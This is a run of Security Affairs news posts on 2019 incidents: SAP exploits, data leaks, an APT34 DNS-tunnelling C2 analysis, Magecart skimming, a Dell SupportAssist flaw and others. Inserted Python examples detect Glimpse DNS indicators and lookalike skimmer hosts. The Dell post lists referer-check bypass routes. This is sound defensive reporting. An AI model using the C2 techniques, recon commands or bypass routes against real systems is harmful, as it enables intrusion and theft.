In April, researchers Dmitry Chastuhin and Mathieu Geli presented security issues related to SAP configuration and architecture at the OPCDE cybersecurity conference in Dubai.

The security duo also released exploits designed to target improperly configured systems.

Experts at Onapsis dubbed the exploits 10KBLAZE; they estimate that the availability of the exploit code could significantly increase the number of attacks against SAP installs. Onapsis estimates that the 10KBLAZE exploits could affect 9 out of 10 SAP systems of more than 50,000 customers worldwide.

“In April 2019, several new exploits targeting SAP business applications were released in a public forum. Although the exploits target insecure configurations that have been reported by SAP SE and Onapsis in the past, their public release significantly increases the risk of successful cyber attacks against SAP implementations globally.” reads the analysis published by Onapsis. “we estimate these exploits could affect 9 out of 10 SAP systems of more than 50,000 customers world-wide.”

The name 10KBLAZE comes from the fact that organizations hit by attacks would need to disclose their impact to the U.S. Securities and Exchange Commission (SEC) in their annual 10-K filing.

“Based on publicly available data provided by SAP, Onapsis estimates that approximately 50,000 companies and a collective 1,000,000 systems are currently using SAP NetWeaver and S/4HANA.” reads the report published by the experts. “Onapsis research gathered over ten years calculates that nearly 90% of these systems, approximately 900,000, may suffer from the misconfigurations for which these exploits are now publicly available,”

Researchers also found many SAP systems exposed on the internet that could be hit by remote, unauthenticated attackers.

Organizations have to check their configurations to prevent such attacks.

Pierluigi Paganini

(SecurityAffairs – 10KBLAZE, Genesis Store)

The post 10KBLAZE exploits could affect 9 out of 10 SAP installs of more than 50k customers appeared first on Security Affairs.

Ladders Database Exposed 13M User Records

Employment-recruitment site Ladders exposed 13M User Records

Employment-recruitment site Ladders left a misconfigured AWS-hosted database containing 13 million user records exposed online.

Sanyam Jain, a security researcher and member of the GDI Foundation, discovered that a database belonging to the employment-recruitment site Ladders had been left exposed online on a misconfigured AWS-hosted instance.

The archive contained 13 million user records, data related to job seekers who had signed up for the service. Exposed records included contact details, current compensation, and applicants’ employment histories.

“Ladders, one of the most popular job recruitment sites in the U.S. specializing in high-end jobs, has exposed more than 13.7 million user records following a security lapse.” reads a report published by TechCrunch.

“The New York-based company left an Amazon-hosted Elasticsearch database exposed without a password, allowing anyone to access the data.”

TechCrunch reported the discovery to the company, which quickly secured the database.

“AWS confirms that our AWS Managed Elastic Search is secure, and is only accessible by Ladders employees at indicated IP addresses. We will look into this potential theft, and would appreciate your assistance in doing so,” said Marc Cenedella, founder and CEO of Ladders.

Experts confirmed that the database contained years’ worth of records.

Pierluigi Paganini

(SecurityAffairs – AWS, data leak)

The post Ladders Database Exposed 13M User Records appeared first on Security Affairs.

Russian national Anton Bogdanov indicted for $1.5M cyber tax fraud scheme

The US DoJ indicted a Russian national for obtaining over $1.5 million in fraudulent tax refunds from the Internal Revenue Service.

The US DoJ indicted the Russian national Anton Bogdanov for obtaining over $1.5 million in fraudulent tax refunds from the Internal Revenue Service.

Bogdanov was charged in federal court in Brooklyn with wire fraud conspiracy, aggravated identity theft and computer intrusion in connection with a scheme in which he and other crooks used stolen personal information to file federal tax returns and fraudulently obtain more than $1.5 million in tax refunds from the Internal Revenue Service.

The Russian man was arrested in Phuket, Thailand, on November 28, 2018 and was extradited to the United States in March 2019. 

“As alleged in the indictment, Bogdanov and his co-conspirators combined sophisticated computer hacking and identity theft with old-fashioned fraud to steal more than $1.5 million from the U.S. Treasury,” stated United States Attorney Donoghue.  “This Office, together with our law enforcement partners, will use all our available resources to target and bring cybercriminals to justice, wherever they are.”

According to the indictment, between June 2014 and November 2016, Anton Bogdanov and his co-conspirators compromised computer systems of private tax preparation firms in the United States and stole personally identifiable information (PII) of the victims, including Social Security numbers and dates of birth.

The crooks used the stolen data to impersonate the victims and modified the tax returns so that the refunds were paid to prepaid debit cards under their control.

“Bogdanov and his co-conspirators also used misappropriated PII to obtain prior tax filings of victims from an IRS website, and filed new tax returns, purportedly on behalf of the victims, so that refunds were paid to prepaid debit cards under their control.” reads the press release published by the DoJ. “The debit cards were cashed out in the United States, and a percentage of the proceeds was wired to Bogdanov in Russia.”


According to the investigators, the debit cards were cashed out in the United States, while Bogdanov received a percentage of the proceeds in Russia.

If convicted of the charges, Anton Bogdanov could face up to 27 years’ imprisonment.

Pierluigi Paganini

(SecurityAffairs – Anton Bogdanov, cybercrime)



The post Russian national Anton Bogdanov indicted for $1.5M cyber tax fraud scheme appeared first on Security Affairs.

APT34: Glimpse project

The APT34 Glimpse project is perhaps the most complete APT34 project known so far; the popular researcher Marco Ramilli analyzed it for us.

In it we observe a file-based command and control structure (a quite unusual solution), a VBS launcher, a PowerShell payload and a covert channel over DNS. This last feature is the characteristic most often attributed to APT34. But let’s move on and start a quick analysis of it.

Context:

Since at least 2014, an Iranian threat group tracked by FireEye as APT34 has conducted reconnaissance aligned with the strategic interests of Iran. The group conducts operations primarily in the Middle East, targeting financial, government, energy, chemical, telecommunications and other industries. Repeated targeting of Middle Eastern financial, energy and government organisations leads FireEye to assess that those sectors are a primary concern of APT34. The use of infrastructure tied to Iranian operations, timing and alignment with the national interests of Iran also lead FireEye to assess that APT34 acts on behalf of the Iranian government. (Source: MISP Project).

On April 19, 2019, researchers at Chronicle, a security company owned by Google’s parent company Alphabet, examined the tools leaked the previous week on a Telegram channel and confirmed that they are indeed the same ones used by the OilRig attackers. OilRig has been connected to a number of intrusions at companies and government agencies across the Middle East and Asia, including technology firms, telecom companies, and even gaming companies. Whoever is leaking the toolset has also been dumping information about the victims OilRig has targeted, as well as data identifying some of the servers the group uses in its attacks.

According to Duo, OilRig has delivered Trojans that use DNS tunneling for command and control in attacks since at least May 2016. “Since May 2016, the threat group has introduced new tools using different tunneling protocols to their tool set,” Robert Falcone of Palo Alto Networks’ Unit 42 research team wrote in an analysis of the group’s activities.

Today I’d like to focus my attention on the Glimpse project since, in my personal opinion, it could be considered the “stereotype” of APT34 (with the data we’ve got so far).

The Glimpse Project

The package comes with a README file named “Read me.txt” (note the space). The name itself is quite unusual, and the content is a simple guide on how to set up a Node.js server and a Windows server that would run the “stand alone” .NET (>v4) application used to control infected machines. The infection starts by propagating a .VBS script called “runner_.vbs”, which is a simple runner for a more sophisticated PowerShell payload. The PowerShell payload is a quite complex script performing several functions. The following image shows its “deobfuscated” main loop.

Glimpse Infection Payload Main Loop

The payload loops waiting for instructions; once a command comes from the C2, it performs the specific action and answers back to the C2 by requesting crafted subdomains based on the variable $aa_domain_bb. One of the most important functions the payload implements is dropping and executing additional toolsets. Indeed, this payload is mainly a delivery module with some additional controls entirely based on a DNS covert channel.

The $aa_domain_bb variable contains the main domain name for which the C2 acts as the authoritative DNS server. While no actions are coming from the C2, the infected agent just periodically “pings” the C2, giving basic information about the victim machine. For example, the function aa_ping_response_bb composes an encoded DNS message (aa_text_response_bb) that sends the agent’s own last IP address. At this stage we can see two communication channels. The first comes from the subdomain generation, for example: 59071Md8200089EC36AC95T.www.example.com, while the second comes from TXT DNS records such as: control: 95 – ackNo: 0 – aid: 59071d8289 – action: M >>> 59071Md8200089EC36AC95T. Both are implemented to carry different information. One of the most important functions is aa_AdrGen_bb, which is the communication manager. It implements the control layer in order to send and receive control information such as commands, bytes received, whether the file transfer has been closed, and so on. The decoded actions are stored in the variable aa_act_bb and are the following:

Command and Control. Env creation for new connected agents
  • M. If the agent is already registered with the C2, this command acts like a ping: it updates basic information in the corresponding “agent” folder. If it is the first time the agent connects back to the C2, it starts a registration phase which, on the server side (the command and control side), builds up a dedicated folder and file environment. Please check the previous image: Command and Control. Env creation for new connected agents.
  • W. This is a TXT request to list the waiting commands (or, if you prefer, “kinds of jobs”). The first command executed after the registration phase is the one tagged 10100, having as content: “whoami&ipconfig /all”
  • D. Is actually what should be executed. It takes the tagged task as input and forwards the Base64-encoded content of the file to the requesting agent.
  • 0. It is not a TXT request. This request makes the authoritative DNS (the command and control) answer the agent with the requested file in the waiting folder. If no “actions” (files) are in the waiting folder, the C2 answers with an A record whose data field is a crafted IP (11.24.237.110); otherwise it answers with an A record whose data field is “24.125.” + fileNameTmp.substring(0, 2) + “.” + fileNameTmp.substring(2, 5) and a time to live that is a random number between 0 and 360.
  • 1. It is not a TXT request. This request makes the authoritative DNS (the command and control) answer back with the file content. It implements a multiple-answer chain, according to RFC 4408, to send files greater than 255 characters.
  • 2. It is not a TXT request. This request makes the authoritative DNS (the command and control) receive a file from the agent. It implements a complex multi-part chain for reconstructing the partial pieces coming from the domain name requests. After sending all of the data, the agent issues a final DNS query with “COCTabCOCT” in the data segment. This query notifies the C2 server that the Trojan has finished sending the contents of the file.
Command and Control: COCTabCOCT end of communication

The following image shows a running example of the infection chain executed in a controlled virtual environment. Note the communication layers over the requested domains. For example, the following request carries data in the subdomain, while the answered IP gives a specific affirmative/negative response.

10100*9056*****************.33333210100A[.]example[.]com

Glimpse running environment
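From a defender’s side, the markers described above (the ‘*’-padded command labels, the COCTabCOCT end-of-upload query, the TXT control records carrying aid:/action:, the 11.24.237.110 “nothing waiting” answer and the 24.125.x.y file-name answers with a TTL of at most 360) can be turned into resolver-log detections. The following Python is an added example, not code from Marco Ramilli’s analysis or from the Glimpse package; the log line layout and the sample log are constructed for it.

```python
"""Spot Glimpse-style DNS covert-channel traffic in resolver query logs."""
import re
from collections import Counter

# Indicators taken from the write-up above.
PADDED_LABEL = re.compile(r"\*{3,}")          # "10100*9056***" style command labels
END_MARKER = "COCTabCOCT"                      # final query of a file upload (action 2)
TXT_CONTROL = re.compile(r"aid:\s*[0-9a-f]+.*action:\s*[A-Z0-9]", re.I)
NO_ACTION_IP = "11.24.237.110"                 # A answer when nothing is waiting (action 0)
FILE_ANSWER = re.compile(r"^24\.125\.\d{1,3}\.\d{1,3}$")  # "24.125." + file-name chunks
FILE_ANSWER_MAX_TTL = 360                      # the C2 picks a random TTL in 0..360

# Constructed sample log; assumed layout: client qname qtype ttl answer...
SAMPLE_LOG = """\
10.0.0.5 59071Md8200089EC36AC95T.www.example.com TXT 0 control: 95 - ackNo: 0 - aid: 59071d8289 - action: M
10.0.0.5 10100*9056*****************.33333210100A.example.com A 133 24.125.10.100
10.0.0.5 COCTabCOCT.33333210100A.example.com A 42 11.24.237.110
10.0.0.7 www.example.com A 3600 93.184.216.34
10.0.0.7 mail.example.com MX 3600 10 mail.example.com
"""


def parse_line(line):
    """Split one log line into its fields; the answer may contain spaces."""
    parts = line.split(maxsplit=4)
    if len(parts) < 5:
        return None
    client, qname, qtype, ttl, answer = parts
    return {"client": client, "qname": qname, "qtype": qtype.upper(),
            "ttl": int(ttl), "answer": answer}


def indicators(rec):
    """Return the Glimpse indicators matched by a single DNS record."""
    hits = []
    labels = rec["qname"].split(".")
    if any(PADDED_LABEL.search(label) for label in labels):
        hits.append("padded-command-label")
    if any(END_MARKER in label for label in labels):
        hits.append("upload-end-marker")
    if rec["qtype"] == "TXT" and TXT_CONTROL.search(rec["answer"]):
        hits.append("txt-control-record")
    if rec["qtype"] == "A":
        if rec["answer"] == NO_ACTION_IP:
            hits.append("no-action-sentinel")
        elif FILE_ANSWER.match(rec["answer"]) and rec["ttl"] <= FILE_ANSWER_MAX_TTL:
            hits.append("encoded-file-answer")
    return hits


def scan(log_text):
    """Return (flagged records, per-client count of suspicious queries)."""
    flagged = []
    per_client = Counter()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        hits = indicators(rec)
        if hits:
            flagged.append((rec["client"], rec["qname"], hits))
            per_client[rec["client"]] += 1
    return flagged, per_client


if __name__ == "__main__":
    flagged, per_client = scan(SAMPLE_LOG)
    for client, qname, hits in flagged:
        print(client, qname, ", ".join(hits))
    print("suspicious queries per client:", dict(per_client))
```

A client that keeps issuing queries of this shape against one zone matches the periodic “ping” behaviour described above and is worth a closer look even when only one indicator fires.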

The command and control is implemented by a standalone .NET application working through files. The backend, a Node.js server, runs and offers a public API and saves requests to agents and results from agents directly into files named with the “UID-IP” convention, which acts as the agent ID. The panel reads those files and implements stats and actions. The following image shows the static configuration section in the C2 panel.

Command and Control Panel Hardcoded Settings

The control panel is mainly composed of two .NET window components: a main window, where the list of connected agents is shown with additional information such as agent ID, agent IP, agent last online time and attacker comments, and a control window, which is opened once the attacker clicks on a selected agent. The onClick event runs the following code:

controlPanel = new controlPanel(agent.id, agent.ip, agent.lastActivity);
controlPanel.Show();

After its initialisation phase the control panel enables the attacker to write or upload a list of commands, or a file containing commands, for the agents. The following image shows the controlPanel function which takes commands from the input “TextFields” and creates a new file containing the commands in the waiting folder. The contents of that folder will be dropped on the selected agent and executed.

Command and Control, controlPanel insert_command function

The controlPanel offers many additional functionalities to better control a single agent or a group of agents. Trying to date the project, we can observe the compile time, which is 9/1/2018 at 5:13:02 AM for newPanel-dbg.exe and 9/8/2018 at 8:01:54 PM for the imported library called ToggleSwitch.dll.

With high probability we are facing a multi-modular attack framework where, on one side, the DNS communication channel delivers commands to the target agents and, on the other side, many control panels could be developed and attached to the DNS communication system. This is quite obvious if you look at the framework as a developer: the DNS communication channel uses files to store information and to synchronise actions and agents, so many C2s could be adapted to use it as a communication channel. We might think that many APT34 units would be able to reuse such a communication channel. Another interesting observation comes from trying to date the framework. A PowerShell agent was leaked on PasteBin in August 2018 (take a look here) by an anonymous user and has been seen, as of today, by very few people (197 so far). The command and control used was compiled the month before (July 2018). The development technologies (.NET, Node.js) are very different, and the implementation styles differ as well. The DNS communication channel is developed in a linear, more function-driven programming style, while the standalone command and control is developed using somewhat more sophisticated object-oriented programming with a flavour of agent-oriented programming: the attacker treats the agent object as an independent agent working without direct control. The attacker writes files as the medium to direct the agent’s behaviour.

The original post was published on the Marco Ramilli’s blog:

https://marcoramilli.com/2019/05/02/apt34-glimpse-project/

About the author: Marco Ramilli, Founder of Yoroi

I am a computer security scientist with an intensive hacking background. I have an MD in computer engineering and a PhD in computer security from the University of Bologna. During my PhD program I worked for the US Government (at the National Institute of Standards and Technology, Security Division), where I did intensive research into malware evasion techniques and penetration testing of electronic voting systems.

I have experience in security testing, since I have been performing penetration testing on several US electronic voting systems. I have also been in charge of testing the uVote voting system for the Italian Minister of homeland security. I met Palantir Technologies, where I was introduced to the Intelligence Ecosystem. I decided to amplify my cybersecurity experience by diving into SCADA security issues with some of the biggest industrial agglomerates in Italy. I finally decided to found Yoroi: an innovative Managed Cyber Security Service Provider developing some of the most amazing cybersecurity defence centers I’ve ever experienced! Now I technically lead Yoroi, defending our customers and strongly believing in: Defence Belongs To Humans

Edited by Pierluigi Paganini

(Security Affairs – APT34, Glimpse project)

The post APT34: Glimpse project appeared first on Security Affairs.

Magecart Group 12 also targets Opencart-based online stores

Magecart made the headlines again: Magecart Group 12 is conducting a large-scale operation that targets OpenCart online stores.

According to security experts at RiskIQ, the Magecart Group 12 is behind a large-scale operation against OpenCart online stores. The attackers used stealth tactics to remain under the radar and siphon payment data from compromised e-commerce sites.

Security firms have monitored the activities of a dozen Magecart groups since at least 2015. The gangs implant skimming scripts into compromised online stores in order to steal payment card data, but they are quite different from each other.

According to a joint report published by RiskIQ and Flashpoint in March, some groups are more advanced than others. The list of victims of Magecart groups is long and includes several major brands such as British Airways, Newegg, Ticketmaster and Feedify.

OpenCart is among the most popular e-commerce platforms worldwide and is currently used by thousands of online stores of any size. Since OpenCart is one of the top three e-commerce CMSs, after Shopify and Magento, it is no surprise that crooks target it too.

Previous attacks carried out by Magecart Group 12 hit e-commerce services used by thousands of online stores that ran versions of Magento, OpenCart and OSCommerce. The attacks against OpenCart-based stores are similar to the Magento ones.

“We’ll also break down a large-scale Magecart Group 12 campaign uncovered by RiskIQ researchers abusing the OpenCart platform, which is run by thousands of e-commerce sites.” reads the analysis published by RiskIQ. “Group 12 breached OpenCart sites to inject their skimmer similar to the Magento attacks, starting with the insertion of a very well-picked domain name: batbing[.]com.”

In the latest wave of attacks, Magecart Group 12 injected their skimmer into OpenCart websites only after checking that the visitor had accessed a checkout page. Technically, they added the following pre-filter JavaScript code:

Magecart Group 12 OpenCart

Attackers used a domain name that attempts to impersonate the Bing.com search engine script.

“One other notable element of this attack is the impersonation attempt for the Bing.com search engine script: “

https://batbing[.]com/js/bat.min.js

The normal Bing URL looks very similar:

https://bat[.]bing[.]com/bat.js
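The lookalike above is the kind of thing a script-host audit on the checkout page catches. The following is an added, illustrative defensive check, not code from the original post or from RiskIQ: it parses the script tags of a checkout page (which must be fetched separately, since the skimmer only loads after the checkout pre-filter), compares every external script host against an allowlist, and flags hosts whose letters and digits match an allowlisted host once punctuation is removed, which is exactly how batbing[.]com shadows bat.bing.com. The allowlist and the sample HTML are constructed for the example.

```python
import re
from urllib.parse import urlsplit

# Constructed allowlist: the third-party script hosts this checkout page is expected to load.
ALLOWED_SCRIPT_HOSTS = {"bat.bing.com", "js.stripe.com"}

# Matches the src attribute of <script> tags; good enough for an audit, not a full HTML parser.
SCRIPT_SRC_RE = re.compile(r'<script\b[^>]*\bsrc\s*=\s*["\']([^"\']+)["\']', re.IGNORECASE)


def skeleton(host: str) -> str:
    """Reduce a hostname to lowercase letters and digits, so that 'bat.bing.com',
    'batbing.com' and 'bat-bing.com' all collapse to the same string 'batbingcom'."""
    return re.sub(r"[^a-z0-9]", "", host.lower())


def external_scripts(html: str):
    """Yield (src, host) for every script loaded from an absolute or protocol-relative URL.
    Relative paths such as /catalog/view/javascript/common.js stay on the store's own
    origin and are skipped here (they belong to a separate file-integrity check)."""
    for src in SCRIPT_SRC_RE.findall(html):
        host = urlsplit(src).hostname
        if host:
            yield src, host.lower()


def audit_script_hosts(html: str, allowed=ALLOWED_SCRIPT_HOSTS):
    """Return one finding per external script host that is not on the allowlist.
    verdict 'lookalike': the host impersonates an allowlisted one by dropping or changing
    punctuation; 'unlisted': the host is simply unknown and needs a human review."""
    by_skeleton = {skeleton(h): h for h in allowed}
    findings = []
    for src, host in external_scripts(html):
        if host in allowed:
            continue
        twin = by_skeleton.get(skeleton(host))
        findings.append({
            "src": src,
            "host": host,
            "verdict": "lookalike" if twin else "unlisted",
            "impersonates": twin,
        })
    return findings


# Constructed checkout page: one legitimate Bing tag, one lookalike (the domain named in the
# RiskIQ analysis), one unknown CDN and one same-origin script.
SAMPLE_CHECKOUT_HTML = """
<html><head>
<script src="https://bat.bing.com/bat.js"></script>
<script type="text/javascript" src='https://batbing.com/js/bat.min.js'></script>
<script src="//cdn.example.net/collect.js"></script>
<script src="/catalog/view/javascript/common.js"></script>
</head><body>checkout</body></html>
"""

if __name__ == "__main__":
    for f in audit_script_hosts(SAMPLE_CHECKOUT_HTML):
        print(f"{f['verdict']:9} {f['host']:24} {f['src']}")
```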

RiskIQ, with the support of abuse.ch and the Shadowserver Foundation, took offline the domain used by the hackers.

Experts found references to the skimmer script in a post on the OpenCart forum.

RiskIQ experts believe that new types of web skimming attacks will be observed in the future, and that hackers will go beyond payment data, attempting to steal login credentials and other sensitive information.

“It’s likely that new breeds of these web skimming attacks will emerge in the future, whether by new or existing Magecart groups. They’re currently focusing on payment data, but we’re already seeing moves to skim login credentials and other sensitive information.” concludes RiskIQ. “This widens the scope of potential Magecart victims far beyond e-commerce alone.”

Pierluigi Paganini

(SecurityAffairs – Magecart Group 12, OpenCart)

The post Magecart Group 12 also targets Opencart-based online stores appeared first on Security Affairs.

A ‘Cyber Event’ disrupted power grid operations in three US states

The Department of Energy confirmed that in March a cyber event disrupted power grid operations in California, Wyoming, and Utah.

The Department of Energy confirmed that in March 2019, between 9 a.m. and 7 p.m., a cyber event disrupted energy grid operations in California, Wyoming, and Utah.

The news was first reported by E&E News: a “cyber event” interrupted grid operations in parts of the western United States in March, according to a report posted by the Department of Energy.

The report states that interruptions of electrical system operations were observed in California (Kern County, Los Angeles County), Utah (Salt Lake County), and Wyoming (Converse County). The report doesn’t include the name of the utility company that suffered the incident. It must be clear that a report of a cyber incident doesn’t necessarily imply that the company has been hacked; in some cases human errors or system misconfigurations could be the root cause of a cyber incident.

power grid incident

U.S. utilities are required to notify the DOE within one hour of a cyber attack against their systems. The DOE can fine power companies that fail to file an OE-417 electric disturbance report up to $2,500 per day.

Media outlets like E&E News and Motherboard correctly described the report as cryptic; the Department of Energy has not responded to a request by Motherboard for more information about the cyber event.

“A “cyber event,” according to infrastructure hacking experts, could be anything from hackers messing with the grid remotely, to a much less dramatic hardware or software bug.” reported MotherBoard.

In any case, if it were confirmed that hackers remotely interfered with power grid networks in the US, the event would be unprecedented for the country. The only power grid hacks recognized by the cyber security community are the ones that caused massive power outages in Ukraine in 2015 and in 2016.

E&E News cited, for instance, an incident that occurred in January 2018 at the Michigan utility Consumers Energy, which filed the same type of DOE notice when an employee in training accidentally caused a blackout for about 15,000 people (Energywire, March 8, 2018).

“There was no malicious intent” in that case, a spokeswoman said at the time, and Consumers Energy brought the lights back on within a few hours.

Cyber attacks against critical infrastructure, including power grids, are dangerous threats whose consequences are unpredictable; for this reason, it is essential to share knowledge about attacks and attackers’ TTPs.

Pierluigi Paganini

(SecurityAffairs – power grid, hacking)

The post A ‘Cyber Event’ disrupted power grid operations in three US states appeared first on Security Affairs.

How to Hack Dell computers exploiting a flaw in pre-installed Dell SupportAssist

A flaw in Dell SupportAssist, a pre-installed tool on most Dell computers, could be exploited by hackers to compromise them remotely.

The security researcher Bill Demirkapi (17) has discovered a critical remote code execution vulnerability in the Dell SupportAssist utility that is pre-installed on most Dell computers.

The vulnerability could be exploited by hackers to compromise systems remotely.

Dell SupportAssist software is described as a tool that proactively checks the health of the system’s hardware and software. When an issue is detected, the necessary system state information is sent to Dell for troubleshooting.

To solve problems, Dell SupportAssist interacts with the Dell Support website and automatically detects the Service Tag or Express Service Code of the Dell product.

The utility performs hardware diagnostic tests and analyzes the hardware configuration of the system, including installed device drivers, and is able to install missing or available driver updates.

Dell SupportAssist tool

The software leverages a local web service that is protected using the “Access-Control-Allow-Origin” response header and by restricting the commands it accepts to those coming from the “dell.com” website or its subdomains.

“On start, Dell SupportAssist starts a web server (System.Net.HttpListener) on either port 8884, 8883, 8886, or port 8885. The port depends on whichever one is available, starting with 8884. On a request, the ListenerCallback located in HttpListenerServiceFacade calls ClientServiceHandler.ProcessRequest. ClientServiceHandler.ProcessRequest, the base web server function, starts by doing integrity checks for example making sure the request came from the local machine and various other checks” reads the analysis published by Bill Demirkapi.

“An important integrity check for us is in ClientServiceHandler.ProcessRequest, specifically the point at which the server checks to make sure my referrer is from Dell.”

Demirkapi discovered that it is possible to bypass the protections implemented by Dell and make the utility download and execute malicious code from a remote server under the attackers’ control.

“To bypass the Referer/Origin check, we have a few options:

  1. Find a Cross Site Scripting vulnerability in any of Dell’s websites (I should only have to find one on the sites designated for SupportAssist)
  2. Find a Subdomain Takeover vulnerability
  3. Make the request from a local program
  4. Generate a random subdomain name and use an external machine to DNS Hijack the victim. Then, when the victim requests [random].dell.com, we respond with our server.”
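The list above turns on one property of the check: any host ending in dell.com is trusted, so a name nobody at Dell serves still passes. The following added example (not Dell’s code and not the researcher’s PoC) models that suffix match beside a stricter guard for a loopback service: an exact HTTPS origin allowlist with no wildcard subdomains, plus a per-launch secret the caller must present, so that an origin string alone never authorizes a command. The header name, the allowlist and the token scheme are assumptions made for the example.

```python
import hmac
import secrets
from urllib.parse import urlsplit


def referer_suffix_check(referer: str) -> bool:
    """Constructed model of a weak check: trust any page whose host is dell.com or
    ends in .dell.com. A hijacked or taken-over [random].dell.com name satisfies it
    even though Dell never served the page."""
    host = (urlsplit(referer).hostname or "").lower()
    return host == "dell.com" or host.endswith(".dell.com")


class LocalServiceGuard:
    """Stricter model for a local (loopback) service, constructed for this example.

    A request is authorized only if (1) its Origin header is an exact HTTPS entry of an
    allowlist, so no subdomain is trusted implicitly, and (2) it carries a secret that was
    generated when the service started and handed only to the legitimate caller.
    """

    ALLOWED_ORIGINS = frozenset({"https://www.dell.com"})  # assumption: exact origins only
    TOKEN_HEADER = "X-Local-Service-Token"  # assumed header name for the per-launch secret

    def __init__(self) -> None:
        # Fresh random token per launch; a web page that merely loads in a browser never sees it.
        self.token = secrets.token_urlsafe(32)

    @staticmethod
    def normalize_origin(origin: str):
        """Return 'scheme://host[:port]' in lowercase, or None if the header is missing,
        unparseable or not HTTPS. Referer is ignored on purpose: it is optional,
        user-controllable and carries a path that invites sloppy substring matching."""
        if not origin:
            return None
        parts = urlsplit(origin.strip())
        if parts.scheme != "https" or not parts.hostname:
            return None
        try:
            port = parts.port
        except ValueError:  # e.g. a non-numeric port
            return None
        suffix = "" if port in (None, 443) else f":{port}"
        return f"{parts.scheme}://{parts.hostname.lower()}{suffix}"

    def authorize(self, headers: dict) -> bool:
        """Decide whether a request may reach a privileged handler."""
        origin = self.normalize_origin(headers.get("Origin", ""))
        if origin not in self.ALLOWED_ORIGINS:
            return False
        presented = headers.get(self.TOKEN_HEADER, "")
        # Constant-time comparison so the token cannot be recovered byte by byte via timing.
        return hmac.compare_digest(presented.encode(), self.token.encode())


if __name__ == "__main__":
    guard = LocalServiceGuard()
    print("suffix check, random subdomain:", referer_suffix_check("https://abc123.dell.com/"))
    print("strict guard, random subdomain:",
          guard.authorize({"Origin": "https://abc123.dell.com",
                           LocalServiceGuard.TOKEN_HEADER: guard.token}))
```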

Dell acknowledged the flaw in a security advisory and released a security update to address it:

“An unauthenticated attacker, sharing the network access layer with the vulnerable system, can compromise the vulnerable system by tricking a victim user into downloading and executing arbitrary executables via SupportAssist client from attacker hosted sites,” reads the advisory.

The remote code execution flaw, tracked as CVE-2019-3719, affects Dell SupportAssist Client versions prior to version 3.2.0.90.

The expert published a video PoC of the hack and the source code of the proof of concept:

Pierluigi Paganini

(SecurityAffairs – Dell SupportAssist, hacking)


The post How to Hack Dell computers exploiting a flaw in pre-installed Dell SupportAssist appeared first on Security Affairs.

Tenable experts found 15 flaws in wireless presentation systems

Experts at Tenable discovered 15 vulnerabilities in eight wireless presentation systems, including flaws that can be exploited to remotely hack devices.

Wireless presentation systems are used to display content from several devices, including mobile devices and laptops, on a screen. These systems are widely used in enterprises and educational organizations.

Researchers at Tenable discovered 15 vulnerabilities in eight wireless presentation systems, some of which can be exploited for command injection and for gaining access to a device.

“Tenable found multiple vulnerabilities while investigating a Crestron AM-100. Tenable also discovered that the Crestron AM-100 shared a code base with the Barco wePresent, Extron ShareLink, InFocus LiteShow, TEQ AV IT WIPS710, SHARP PN-L703WA, Optoma WPS-Pro, Blackbox HD WPS, and possibly others.” reads the analysis published by Tenable. “The vulnerabilities listed below do not affect all devices”

The experts focused their tests on the Crestron AirMedia AM-100 and AM-101 products, but systems from other vendors could be affected because these devices reuse portions of the same code base. Experts discovered that some of the issues also impact Barco wePresent, Extron ShareLink, InFocus LiteShow, TEQ AV IT WIPS710, SHARP PN-L703WA, Optoma WPS-Pro, Blackbox HD WPS, and potentially other vendors.

wireless presentation systems

Several flaws could be exploited by a remote, unauthenticated attacker to inject operating system commands. Other issues can be exploited by a remote, unauthenticated attacker to change admin and moderator passwords and view presentations.

The issues, including a hardcoded session ID, allow an unauthenticated, remote attacker to stop, start, and disconnect any screen sharing session due to insufficient authentication checking in the moderator controls.

Experts also found a denial-of-service (DoS) flaw and credentials stored in plain text that could be accessible to authenticated users.

A Shodan search for Crestron AirMedia devices exposed online returns hundreds of devices, most of them located in the US, followed by Canada and Finland.

Tenable started reporting the vulnerabilities to vendors in January, but at the time of the public disclosure, only Extron and Barco had released firmware updates.

While waiting for fixes, users have to configure their environments so that these systems are not exposed to the internet.

Pierluigi Paganini

(SecurityAffairs – wireless presentation systems, hacking)

The post Tenable experts found 15 flaws in wireless presentation systems appeared first on Security Affairs.

Citrix confirmed hackers had access to its network for five months

Citrix confirmed that the hackers who breached its network stole sensitive personal information of both former and current employees for about six months.

In March, the American multinational software company Citrix disclosed a security breach; according to the firm, an international cyber criminal gang gained access to its internal network. Experts at cybersecurity firm Resecurity attributed the attack to Iranian threat actors.

Hackers were able to steal business documents, but the company’s products and services were not impacted by the attack.

Citrix discovered the intrusion after being notified by the FBI on March 6, 2019; the company announced it had secured its network and hired a forensic firm to assist with the investigation of the incident.

Now the software giant Citrix provided more details about the data breach and confirmed that hackers had access to its network for roughly five months.

This week Citrix submitted a notice of data breach to the California Office of the Attorney General explaining that attackers had intermittent access to its network between October 13, 2018, and March 8, 2019.

The attackers exfiltrated files from company systems, some of which stored information on current and former employees. Exposed data includes names, Social Security numbers, and financial information.

“We currently believe that the cyber criminals had intermittent access to our network between October 13, 2018 and March 8, 2019 and that they removed files from our systems, which may have included files containing information about our current and former employees and, in limited cases, information about beneficiaries and/or dependents.” reads the notice of data breach sent by Citrix.

Citrix

At the time of writing it is still unclear how many people have been impacted by the data breach.

California’s Civil Code 1798.82(a) obliges companies to report data breaches to the state’s Attorney General if more than 500 California residents are impacted. This implies that, even if Citrix did not provide the total number of affected employees in the notice, at least 500 of the state’s residents are affected.

The company is notifying all potentially impacted individuals and providing them with free credit monitoring and fraud protection services.

“Additionally, and as a precaution, we have arranged for you, at your option, to enroll in Equifax ID Patrol, a complimentary one-year credit monitoring, dark web monitoring, and identity restoration service. ” continues the notice.

In early April, Citrix revealed that hackers likely breached its network via password spraying, meaning that the hackers attempted to access accounts using commonly used passwords.

“We identified password spraying, a technique that exploits weak passwords, as the likely method by which the threat actors entered our network.” reads a blog post published by Citrix.

Pierluigi Paganini

(SecurityAffairs – Citrix, data breach)

The post Citrix confirmed hackers had access to its network for five months appeared first on Security Affairs.

Victims of ZQ Ransomware can decrypt their files for free

Good news for the victims of the ZQ Ransomware: security experts at Emsisoft have released a free decryptor tool.

Good news for the victims of the ZQ Ransomware: security experts at Emsisoft have released a free decryptor tool that allows them to recover their files without paying.

ZQ Ransomware infected users in the US, India, Poland, Brazil and the UK.

The ZQ Ransomware encrypts victims’ files using the Salsa20 and RSA-1024 algorithms. The malware adds the extension “.[w_decrypt24@qq.com].zq” to the encrypted files.

